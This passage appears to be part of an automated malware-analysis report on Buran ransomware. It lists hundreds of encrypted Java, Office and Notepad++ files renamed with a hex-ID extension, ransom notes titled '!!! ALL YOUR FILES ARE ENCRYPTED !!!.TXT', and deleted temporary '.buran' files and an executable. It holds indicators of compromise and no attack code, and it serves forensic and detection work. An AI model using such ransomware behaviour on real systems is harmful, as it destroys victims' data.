1187. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1188. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
1189. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1190. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
1191. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1192. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
1193. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1194. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
1195. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1196. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
1197. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1198. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
1199. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1200. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
1201. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1202. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
1203. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1204. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
1205. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1206. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
1207. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1208. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
1209. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1210. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
1211. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1212. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1213. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
1214. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1215. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
1216. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1217. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
1218. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1219. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
1220. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1221. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
1222. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1223. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
1224. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
1225. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
1226. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1227. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
1228. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1229. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
1230. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1231. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
1232. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1233. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
1234. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1235. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
1236. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1237. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
1238. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1239. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1240. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
1241. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1242. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
1243. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1244. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
1245. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1246. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
1247. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1248. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
1249. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1250. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
1251. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1252. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
1253. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1254. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
1255. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1256. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1257. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
1258. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1259. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
1260. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1261. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
1262. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1263. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
1264. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1265. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
1266. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1267. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
1268. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1269. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
1270. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1271. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
1272. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1273. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1274. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
1275. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1276. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
1277. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access.875B149F-7E2C-F9D8-914C-24C48737255D",
1278. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1279. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
1280. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template.875B149F-7E2C-F9D8-914C-24C48737255D",
1281. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
1282. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1283. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
1284. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template.875B149F-7E2C-F9D8-914C-24C48737255D",
1285. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
1286. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist.875B149F-7E2C-F9D8-914C-24C48737255D",
1287. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1288. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
1289. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs.875B149F-7E2C-F9D8-914C-24C48737255D",
1290. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
1291. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts.875B149F-7E2C-F9D8-914C-24C48737255D",
1292. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
1293. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
1294. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
1295. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security.875B149F-7E2C-F9D8-914C-24C48737255D",
1296. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
1297. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
1298. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\trusted.libraries",
1299. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
1300. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1301. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1302. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
1303. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1304. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
1305. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1306. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1307. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
1308. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1309. "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
1310. "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
1311. "C:\\Program Files\\Microsoft Office\\Office15\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1312. "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
1313. "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1314. "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
1315. "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
1316. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
1317. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1318. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1319. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
1320. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1321. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
1322. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1323. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
1324. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1325. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
1326. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1327. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1328. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
1329. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1330. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
1331. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1332. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
1333. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1334. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
1335. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
1336. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
1337. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1338. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
1339. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
1340. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
1341. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
1342. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
1343. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
1344. "C:\\Program Files\\Notepad++\\contextMenu.xml",
1345. "C:\\Program Files\\Notepad++\\contextMenu.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1346. "C:\\Program Files\\Notepad++\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1347. "C:\\Program Files\\Notepad++\\functionList.xml",
1348. "C:\\Program Files\\Notepad++\\functionList.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1349. "C:\\Program Files\\Notepad++\\langs.model.xml",
1350. "C:\\Program Files\\Notepad++\\langs.model.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1351. "C:\\Program Files\\Notepad++\\LICENSE",
1352. "C:\\Program Files\\Notepad++\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D"
1353.  
1354.  
1355. * Deleted Files:
1356. "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
1357. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
1358. "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe",
1359. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
1360. "C:\\.doc",
1361. "C:\\.htm",
1362. "C:\\.jpeg",
1363. "C:\\.jpg",
1364. "C:\\.pptx",
1365. "C:\\.txt",
1366. "C:\\.xls",
1367. "C:\\Host.bmp",
1368. "C:\\Host.docx",
1369. "C:\\Host.html",
1370. "C:\\Host.jpeg",
1371. "C:\\Host.jpg",
1372. "C:\\Host.pdf",
1373. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
1374. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
1375. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
1376. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
1377. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
1378. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
1379. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
1380. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
1381. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
1382. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
1383. "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
1384. "C:\\Program Files\\Java\\jre1.8.0_201\\release",
1385. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
1386. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
1387. "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
1388. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
1389. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
1390. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
1391. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
1392. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
1393. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
1394. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
1395. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
1396. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
1397. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
1398. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
1399. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
1400. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
1401. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
1402. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
1403. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
1404. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
1405. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
1406. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
1407. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
1408. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
1409. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
1410. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
1411. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
1412. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
1413. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
1414. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
1415. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
1416. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
1417. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
1418. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
1419. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
1420. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
1421. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
1422. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
1423. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
1424. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
1425. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
1426. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
1427. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
1428. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
1429. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
1430. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
1431. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
1432. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
1433. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
1434. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
1435. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
1436. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
1437. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
1438. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
1439. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
1440. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
1441. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
1442. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
1443. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
1444. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
1445. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
1446. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
1447. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
1448. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
1449. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
1450. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
1451. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
1452. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
1453. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
1454. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
1455. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
1456. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
1457. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
1458. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
1459. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
1460. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
1461. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
1462. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
1463. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
1464. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
1465. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
1466. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
1467. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
